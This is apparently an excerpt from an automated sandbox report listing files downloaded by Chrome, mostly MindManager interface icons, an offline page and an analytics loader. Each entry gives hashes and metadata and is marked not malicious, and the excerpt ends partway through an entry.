                                                                SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://btee.pradjoun.com/ijpzNG4eoeuscKsV7qz7sN5dPHJwxyBagVy9ckgUO29Y2uv56161
                                                                Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):612
                                                                Entropy (8bit):5.054367817379149
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2BC7E2B8F2AF9635A63C5B76BA8E72B2
                                                                SHA1:54420DF98BB19068E5668E74B65B9D6FBB3D035F
                                                                SHA-256:D4C7D66B41A1568932ECA575FEE7A87DFCA285FED905179D38AFD9841DC46B51
                                                                SHA-512:6557C386EAB8AF7083DAEFA8DFEE217178AE2FD13829E70FE64B26A0D06BE539B302BED059C55AA8F1CBC965C37F596BA5B8D2EB34675971CA0EAB4122901618
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_share_new.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 22 23"><defs><style>.cls-1,.cls-2{fill:#96be7d;stroke:#63a558;stroke-miterlimit:10;}.cls-1{stroke-width:2px;}</style></defs><title>web app toolbar assets share</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_2-2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><line class="cls-1" x1="5.17" y1="13.2" x2="14.5" y2="17.5"/><line class="cls-1" x1="7.38" y1="9.5" x2="14.5" y2="6.22"/><circle class="cls-2" cx="4" cy="11.5" r="3.5"/><circle class="cls-2" cx="18" cy="4" r="3.5"/><circle class="cls-2" cx="18" cy="19" r="3.5"/></g></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):998
                                                                Entropy (8bit):5.040285266032499
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:671FD54FE5F5FDA438514FD381338CB3
                                                                SHA1:05F4237D073EAFE07319627774462EA2949FF1D4
                                                                SHA-256:88089334E7994C99921AD51B0A42C923034589F5B16260E3B6491ABBE2E32674
                                                                SHA-512:7DEF7D43F877DFC6CD9A443A2F73F735FDE1C6055C9834D748F530191041C59F032E1BCCE4EDACB0A0B7C6807219F09D2180FE3BF821BC48BA9A84BC1F508B22
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/save-as.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}.cls-3{fill:#c9c9c9;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M2,23.5A1.5,1.5,0,0,1,.5,22V2A1.5,1.5,0,0,1,2,.5H16.69L23.5,7.31V22A1.5,1.5,0,0,1,22,23.5Z"/><path class="cls-2" d="M16.48,1,23,7.52V22a1,1,0,0,1-1,1H2a1,1,0,0,1-1-1V2A1,1,0,0,1,2,1H16.48m.41-1H2A2,2,0,0,0,0,2V22a2,2,0,0,0,2,2H22a2,2,0,0,0,2-2V7.11L16.89,0Z"/><rect class="cls-1" x="3.5" y="14.5" width="17" height="6" rx="0.5"/><path class="cls-2" d="M20,15v5H4V15H20m0-1H4a1,1,0,0,0-1,1v5a1,1,0,0,0,1,1H20a1,1,0,0,0,1-1V15a1,1,0,0,0-1-1Z"/><rect class="cls-2" x="6" y="16" width="12" height="1"/><rect class="cls-2" x="6" y="18" width="12" height="1"/><path class="cls-2" d="M7,1H18a0,0,0,0,1,0,0V6.42A2.58,2.58,0,0,1,15.42,9H9.58A2.58,2.58,0,0,1,7,6.42V1A0,0,0,0,1,7save-as.svg,1Z"/><rect class="cls-3" x="14" y="3" width="2" height="4"/></g></g></svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):702
                                                                Entropy (8bit):5.0651647811376606
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:1E9929B5726DEF58813232D01ECC1F77
                                                                SHA1:4FA30B67497EE2FFA09330B0264EAFEEBB94EE2E
                                                                SHA-256:721F617F3BB55FB6A8A80D452E51B569916E0C856DE462CB0DD08BF84122D4A8
                                                                SHA-512:E18D198826A2FF49ECEA0BD0858F5B092F7BDF775606B8DC71292B3CDBBDAD965DD5F746FEC7616AD027060999FCC855E74633E0DA4B7FA8B06ED2142FBF7A06
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/objects/text-bubble.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 15.52"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}</style></defs><title>background_shape_Asset 72</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M11.71,11.72l-.41.16A9,9,0,0,1,8,12.5C3.86,12.5.5,9.81.5,6.5S3.86.5,8,.5s7.5,2.69,7.5,6a5.2,5.2,0,0,1-1.29,3.36l-.08.09-1,4.23Z"/><path class="cls-2" d="M8,1c3.86,0,7,2.47,7,5.5a4.69,4.69,0,0,1-1.17,3l-.16.18-.05.23-.7,2.89-.56-1-.43-.76-.81.32A8.48,8.48,0,0,1,8,12C4.14,12,1,9.53,1,6.5S4.14,1,8,1M8,0C3.58,0,0,2.91,0,6.5S3.58,13,8,13a9.47,9.47,0,0,0,3.49-.66l1.8,3.18,1.3-5.34A5.65,5.65,0,0,0,16,6.5C16,2.91,12.42,0,8,0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):328
                                                                Entropy (8bit):4.97838891376414
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5D902B57E7A8099C256758F6ECECE36D
                                                                SHA1:E896D6E0F440EDA93AD7B2812C2ACC7474589806
                                                                SHA-256:28D245728B79017130A788C0A06E4FCE9AA8BA77D0EB7AC05A9C16C34F4B3FE7
                                                                SHA-512:C615B481794F6D977F2DE25AF1DA94DDBE00D82FEDE7740457D556BB70BD3FB17113043A55EE86143B36FA4A8CB15DA2997772A22571BCC21F6D3B1E75699451
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/information.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#1c97e6;}.cls-2{fill:#fff;}</style></defs><title>info_16</title><circle class="cls-1" cx="8" cy="8" r="8"/><rect class="cls-2" x="6" y="7" width="4" height="7"/><circle class="cls-2" cx="8" cy="4" r="2"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, Unicode text, UTF-8 text
                                                                Category:downloaded
                                                                Size (bytes):3658
                                                                Entropy (8bit):4.512585450232857
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:3711BBF8F00B8AF50FDD062E03667414
                                                                SHA1:417FC625894B3EEC02390B3D29BF1D27212A2446
                                                                SHA-256:6C7A8B9C6C8E1CC57C7BE3DBD94C05D03F4F120166A1053AF03D6ABE1B859711
                                                                SHA-512:7154B11B73C2A3C778D8BDEA531B2D615C6DC0B543139503638149A14C73B0E038B6986E2ACE81C4E50BF5400934947E4F16F3459E1ACD74DDDE6CDB9DFE9663
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/offline.html
                                                                Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="utf-8"/>. <meta http-equiv="X-UA-Compatible" content="IE=edge"/>. <meta name="viewport" content="width=device-width, initial-scale=1"/>.. <title>You are offline</title>.. Inline the page's stylesheet. -->. <style>. body {. font-family: helvetica, arial, sans-serif;. margin: 2em;. }.. h1 {. font-style: italic;. color: #3367D6;. }.. p {. margin-block: 1rem;. }.. button {. display: block;. }. </style>.</head>.<body>.<h1>You are offline</h1>..<p>Click the button below to try reloading.</p>.<button type="button">. Reload</button>.. Inline the page's JavaScript file. -->.<script>.. var toParams = function(str) {.. return str.split('&').reduce(function(res, item) {. var index = item.indexOf('=');. var name = item.substring(0, index);. var value
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1832
                                                                Entropy (8bit):4.950672381400729
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:07701ED4C6D619900BA067BE75211C07
                                                                SHA1:C8DAC227A8FBFBCD627BEFC05F9248D18FBAAB23
                                                                SHA-256:A66986768D6286FB22E2F6C45BF3C092F2950563C1D430F8260EB58579006976
                                                                SHA-512:D4A56BC09EDADC4E340BEF435D044ED48997BC931F190359FB2CA665321E6935E3A5B893CFE32FBD944CB933B39C59465E6D6606420AE71987987CEC6B0C4CA9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/flash-message/save.svg
                                                                Preview:<svg width="16px" height="16px" viewBox="0 0 16 16" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="save" fill-rule="nonzero">. <path d="M1.33,15.5 C0.871603658,15.5 0.5,15.1283963 0.5,14.67 L0.5,1.33 C0.5,0.871603658 0.871603658,0.5 1.33,0.5 L11.05,0.5 L15.5,4.94 L15.5,14.66 C15.5,15.1183963 15.1283963,15.49 14.67,15.49 L1.33,15.5 Z" id="Path" fill-opacity="0" fill="#3E9EFF"></path>. <path d="M10.85,1 L15,5.15 L15,14.66 C14.994778,14.8400466 14.8500466,14.984778 14.67,14.99 L1.33,14.99 C1.15363416,14.9851123 1.01031073,14.846132 1,14.67 L1,1.33 C1.005222,1.14995341 1.14995341,1.005222 1.33,1 L10.84,1 L10.85,1 Z M11.25,0 L1.33,0 C0.597728377,0.00544462386 0.00544462386,0.597728377 0,1.33 L0,14.67 C0.00544462386,15.4022716 0.597728377,15.9945554 1.33,16 L14.67,16 C15.4022716,15.9945554 15.9945554,15.4022716 16,14.67 L16,4.74
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):591
                                                                Entropy (8bit):5.15617727555782
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9F2B29E4400D59C2AB873655C24E20C8
                                                                SHA1:BA6ACE87C7307BE0A7204F6070C9CACDB151BFF8
                                                                SHA-256:9C94D2A67B1D822EA2D72DAF97E4AF882AD37AAFEB6BBFC29D043BF9579D6D69
                                                                SHA-512:1ED37EB617DE4121131342C200A9A5CBDC5EDDAD074F26BB2FD0AFBB6794928953AD063DCA86814AE8F8281B1C653C09189871A543E6E2011463505E605A1D7C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/roPercentageDone01.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#2a6bac;}.cls-3{fill:gray;}</style></defs><title>roPercentageDone01</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><path class="cls-3" d="M-.5,16.5v-4h1V11A1.5,1.5,0,0,1,2,9.5H3A1.5,1.5,0,0,1,4.5,11v1.5h1v4Z"/><path class="cls-1" d="M3,10a1,1,0,0,1,1,1v2H5v3H0V13H1V11a1,1,0,0,1,1-1H3M2,13H3V11H2v2M3,9H2a2,2,0,0,0-2,2v1H-1v5H6V12H5V11A2,2,0,0,0,3,9Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):737
                                                                Entropy (8bit):5.159951229902648
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6C472150599D4C0BEB984C08BC609920
                                                                SHA1:A6C4C9A99970967F6E6B30A0164913874F190272
                                                                SHA-256:B7B1C8D91092942A041091477C7CA4DAE9043393F3F0563AC3B43ECF596325F3
                                                                SHA-512:43DA1523FAE201B2D846C32D265515E00ED256450E68A3E693CD3AF927C39CEA1BCF3306E165AC5458672F9140E4539369961813724BCC89CFD9A29E6E35040B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/mailbox.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#f8804a;}.cls-2{fill:#f03637;}.cls-3{fill:#4d4d4d;}.cls-4{fill:#fbb400;}</style></defs><title>mailbox_16</title><rect class="cls-1" x="8" y="11" width="2" height="5"/><path class="cls-2" d="M16,12l0,0V6.21C16,3.89,14.43,2,12.5,2h-7C3.57,2,2,3.89,2,6.21V11.5l.5.5Z"/><rect class="cls-2" y="10" width="5" height="2" rx="0.5" ry="0.5"/><path class="cls-3" d="M9,10V5.89a2.79,2.79,0,0,0-1.62-2.6A3,3,0,0,0,3,5.75V10Z"/><circle class="cls-4" cx="11.5" cy="5.5" r="1.5"/><rect class="cls-4" x="11" width="1" height="5"/><rect class="cls-4" x="12" width="2" height="2"/><circle class="cls-2" cx="11.5" cy="5.5" r="0.5"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (9504), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):9504
                                                                Entropy (8bit):5.558843520210952
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FC9F8D8B97D18AA02DEBC8B32FDA21C0
                                                                SHA1:4759F2D7B902A77CC58823FD68BAE4AABF0869B7
                                                                SHA-256:D9ED33F5D6884A1324416C08E6372551835B80D4E3579E08D4AF5D618E48A1DC
                                                                SHA-512:4B6ED6DA20C9350E11BE54E84005AE51CBEDA6A5EEB71FBDCF985A2A580B3C49F21DEE7453EDB1674485243F7255ECD18081D5A7EBAEC60429EDD3FEB44FDF3A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://ipm.corel.com/static/ipm/product-analytics/js/analytics.min.js
                                                                Preview:!function(e,t){var i=e.amplitude||{_q:[],_iq:{}},n=t.createElement("script");function r(e,t){e.prototype[t]=function(){return this._q.push([t].concat(Array.prototype.slice.call(arguments,0))),this}}function s(){return this._q=[],this}n.type="text/javascript",n.integrity="sha384-9jIJQlEp6cEk6foaEO/N5yzaJmQbTtugbpg9l8P/javk55WlPh7fJGR1vHhyDjON",n.crossOrigin="anonymous",n.async=!0,n.src="https://cdn.amplitude.com/libs/amplitude-8.4.0-min.gz.js",n.onload=function(){e.amplitude.runQueuedFunctions||console.log("[Amplitude] Error: could not load SDK")},(t=t.getElementsByTagName("script")[0]).parentNode.insertBefore(n,t);for(var a=["add","append","clearAll","prepend","set","setOnce","unset","preInsert","postInsert","remove"],c=0;c<a.length;c++)r(s,a[c]);function o(){return this._q=[],this}i.Identify=s;for(var d=["setProductId","setQuantity","setPrice","setRevenueType","setEventProperties"],u=0;u<d.length;u++)r(o,d[u]);i.Revenue=o;var p=["init","logEvent","logRevenue","setUserId","setUserPrope
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1527
                                                                Entropy (8bit):4.475213927902451
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9FF4BA2CAB9460F6D20D1B1F82999BBA
                                                                SHA1:4DF5BEB16EF4970A2C58D354ED02ADB2434342D2
                                                                SHA-256:666DF54710A1663F003EA8F6628618808481EDC64179EF82C8D93DD40CFA4024
                                                                SHA-512:A8045096B8AEE0D3D90ABF4A8C5CEDF1684C28F2CBB1D92129E4CC0CED2C47BA66AC51A41B8F43A9F8CB05DD4209EF92FDBFE8CCD3543C06E24E1A1A31CB8F1F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/priority09.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#9a9aa3;}.cls-2{fill:#727272;}.cls-3{fill:#fff;}</style></defs><title>priority09</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="0.5" ry="0.5"/><path class="cls-2" d="M15,1V15H1V1H15m0-1H1A1,1,0,0,0,0,1V15a1,1,0,0,0,1,1H15a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1Z"/><path class="cls-2" d="M5.33,13.46,6,11.36a3.51,3.51,0,0,0,1.37.29A2.12,2.12,0,0,0,9.51,10h0a1.66,1.66,0,0,1-.59.25,3.8,3.8,0,0,1-.79.1A3,3,0,0,1,5.44,8.93a3.73,3.73,0,0,1-.6-2,3.37,3.37,0,0,1,.93-2.36,3.22,3.22,0,0,1,2.48-1,3.84,3.84,0,0,1,2.86,1.24,4.9,4.9,0,0,1,1.2,3.54,6.56,6.56,0,0,1-.31,2,6.21,6.21,0,0,1-.9,1.78,4.2,4.2,0,0,1-1.51,1.28,4.39,4.39,0,0,1-2,.48A5.06,5.06,0,0,1,5.33,13.46ZM8.76,8.65c.69,0,1-.2,1-.6A2.07,2.07,0,0,0,9.3,6.64a1.36,1.36,0,0,0-1.05-.58.88.88,0,0,0-.72.33,1.16,1.16,0,0,0-.28.79,1.54,1.54,0,0,0,.37,1A1.44,1.44,0,0,0,8.76,8.65Z"/><path class="cls-3" d="M4.33,12.46,5,10.3
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):567
                                                                Entropy (8bit):4.911639630509738
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:50468371A98028114EE775A667F5331D
                                                                SHA1:33239E2224488F73B3FC42F9655994D7530C27B5
                                                                SHA-256:7D248B4B25F2E985CC9633D2D6D18859DD55B84D1760CB6FD0B57DB86A0461F3
                                                                SHA-512:077F71632B9C23F5F316AA39CDFD150005540CF6D33FD5248F4EECDF699C668DB85099CB41F6E3FE5E81F2C9217CA7461A458EFE102E03969A6666003D46012A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/modern/topic_info_icon_attachment.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:gray;}</style></defs><title>topic_info_icon_attachment</title><path class="cls-1" d="M8.94,6.06,8.5,5.59l-4.22,4C3.15,10.68,2.76,12.11,3.55,13s2.25.52,3.38-.56l6-5.7a3.31,3.31,0,0,0,.3-4.7,3.3,3.3,0,0,0-4.71.06L2.4,7.85a4.62,4.62,0,0,0-.33,6.51,4.62,4.62,0,0,0,6.51,0l4.33-4.12-.44-.47L8.14,13.89a4,4,0,0,1-5.61,0,4,4,0,0,1,.31-5.6L9,2.51a2.67,2.67,0,0,1,3.82-.09,2.67,2.67,0,0,1-.29,3.81l-6,5.7c-.87.82-1.92,1.17-2.48.58s-.15-1.62.71-2.44Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:dropped
                                                                Size (bytes):495
                                                                Entropy (8bit):5.335545102770731
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D7A9BF117DAC5B68BED148F141DE57BC
                                                                SHA1:20F437558062097FEEDB4899E3D7196052DBFEF7
                                                                SHA-256:434A1956021C662A530FD29827648029437227DB87E33A85586AF3E5858C3A05
                                                                SHA-512:9E50F79C2CA6169788625091F3AECCDA061381F1A6CD441DA38B6767A4A7F9498D06AD8EE6979E64DE1210546685D4A2CECAA23DEBFE8210CEF47F434278BFDF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 17"><defs><style>.cls-1{fill:#cbcacb;}.cls-2{fill:gray;}.cls-3{fill:#fff;stroke:gray;stroke-miterlimit:10;}</style></defs><title>topic_info_icon_resource</title><circle class="cls-1" cx="8" cy="6" r="2.5"/><path class="cls-2" d="M8,4A2,2,0,1,1,6,6,2,2,0,0,1,8,4M8,3a3,3,0,1,0,3,3A3,3,0,0,0,8,3Z"/><path class="cls-3" d="M7.85,9.07c-2.79,0-5.06,1.43-5.06,4.43H12.92C12.92,10.5,10.65,9.07,7.85,9.07Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):5655
                                                                Entropy (8bit):4.8368328635102085
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0444BF8D111FE746870457F7C27636A8
                                                                SHA1:BEF65B483D9DD160C2A8C9994B05ADAD8A339195
                                                                SHA-256:17A3DF806BD42CA051271434AE34E4D3CF276D79517A1723A42C45670FE16EDC
                                                                SHA-512:D35CC8A5E4D8C44A90605BA4D939D72ED32EE473367258362C2C3A751AEE3007D73FCEA4DEEA215B3227FFDAB660B45EA45BC2BD5AD70D7C2945586828201CA0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/fishbonediagram.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M147.801 12.5854C147.958 12.358 148.269 12.3007 148.497 12.4575C148.724 12.6142 148.781 12.9255 148.625 13.1529L147.801 12.5854ZM126.281 44.6897L125.871 44.9757C125.752 44.8047 125.751 44.5776 125.869 44.406L126.281 44.6897ZM148.623 75.8612C148.781 76.0877 148.725 76.3994 148.499 76.5573C148.272 76.7152 147.961 76.6596 147.803 76.4331L148.623 75.8612ZM148.625 13.1529L126.693 44.9735L125.869 44.406L147.801 12.5854L148.625 13.1529ZM126.691 44.4038L148.623 75.8612L147.803 76.4331L125.871 44.9757L126.691 44.4038Z" fill="#57B6C0"/>.<path d="M110.369 12.5854C110.525 12.358 110.837 12.3007 111.064 12.4575C111.291 12.6142 111.349 12.9255 111.192 13.1529L110.369 12.5854ZM88.8484 44.6897L88.4382 44.9757C88.319 44.8047 88.3184 44.5776 88.4367 44.406L88.8484 44.6897ZM111.19 75.8612C111.348 76.0877 111.293 76.3994 111.066 76.5573C110.84 76.7152 110.528 76.6596 110.37 76.4331L111.19 75.8612ZM11
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):772
                                                                Entropy (8bit):5.185961679901006
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:67556CEA20A6EF5FB45BDED10AD25528
                                                                SHA1:C210F0AFCBA05087D07202E096C09B7A7A9CF03C
                                                                SHA-256:6E4C41CE15FCB6206841C31EDF42830D2FFB239CA46D25D53370283084C6D92E
                                                                SHA-512:52B0A3C8A49D579C04A5412BACA88A9D37397B6909A676D576FEFF404EA5638C1898A166D84297CC2F0BD2AFD229215FE5B2E62F35C7B9F27119BBD2B157801A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/roPercentageDone03.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#2a6bac;}.cls-3{fill:#4197ff;}.cls-4{fill:#2979cd;}.cls-5{fill:gray;}</style></defs><title>roPercentageDone03</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><path class="cls-3" d="M8.5,7.5v-7a7.49,7.49,0,0,1,7,7Z"/><path class="cls-4" d="M9,1.07A7,7,0,0,1,14.93,7H9V1.07M8,0V8h8A8,8,0,0,0,8,0Z"/><path class="cls-5" d="M-.5,16.5v-4h1V11A1.5,1.5,0,0,1,2,9.5H3A1.5,1.5,0,0,1,4.5,11v1.5h1v4Z"/><path class="cls-1" d="M3,10a1,1,0,0,1,1,1v2H5v3H0V13H1V11a1,1,0,0,1,1-1H3M2,13H3V11H2v2M3,9H2a2,2,0,0,0-2,2v1H-1v5H6V12H5V11A2,2,0,0,0,3,9Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 50 x 38, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):328
                                                                Entropy (8bit):6.874018077543561
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A3407DF7B114668BF2BF5E3A2BBD9D1A
                                                                SHA1:5C839A0CA20195E98A9F5147D6B5AFA89B37D58D
                                                                SHA-256:A640CDEA21636343E1E956E664F0708026A070E65E1ECF0CA30A8B7CB2C03DD6
                                                                SHA-512:2D73B09E677EF534CAD45546F965494F267ECBEC5C4AD15F2AB78CD332575BD6A30F8A87B74D8616D16D0E762F6155A4F752E6F0EE4575B3997AE511BF285A4E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-shape-rectangle.png
                                                                Preview:.PNG........IHDR...2...&......x.<....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<....IDATx......0...g..@...x...:F6..t....A.H..`....VJk.4......?^.I..:....Z...m..c,;.4Ma.U..RJ..;H..q=.N.. .... ......-...5.,...y..Z....I.s....H].Z.n...&.."... ...1.......H.4...@....@...}....1...:....]l.......'@.Kk=....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):487
                                                                Entropy (8bit):5.25887300263748
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:86D39EF49BA18DB4DAC1890D1BA9989C
                                                                SHA1:E519FE98756570F57E648A8BF8CDBD90DE2B9B9D
                                                                SHA-256:34B01AC083C3ED3A3810A5A659ECA53F7150FFF96365EC11AFE5CCDC85066581
                                                                SHA-512:2B7275197EDADFD7957792A431F85621B2BCE3EE7BA591F505F0D3E8BA7FF2544106090B256B9F02C3AEE0E0348408EDE8C5BEDD230F00F12887571483CE5A7F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/design/layout-right.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 11 7"><defs><style>.cls-1{fill:none;stroke:#3271ae;}.cls-1,.cls-2{stroke-miterlimit:10;}.cls-2{fill:#efeeee;stroke:#4a4a4a;}</style></defs><title>layout-right</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><line class="cls-1" x1="5" y1="3.5" x2="7" y2="3.5"/><path class="cls-1" d="M11,6.5H9A1.48,1.48,0,0,1,7.5,5V2A1.48,1.48,0,0,1,9,.5h2"/><circle class="cls-2" cx="3" cy="3" r="2.5"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1102
                                                                Entropy (8bit):5.229075020650895
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B595125F4E97BF0D17B7378131A7C075
                                                                SHA1:45BA518F8420B353515074C94B8B2760717D858F
                                                                SHA-256:5BF185FD75FD92F33B03F26268B3CBE30525A9B14D97FC3BE812EE666ADFC5E3
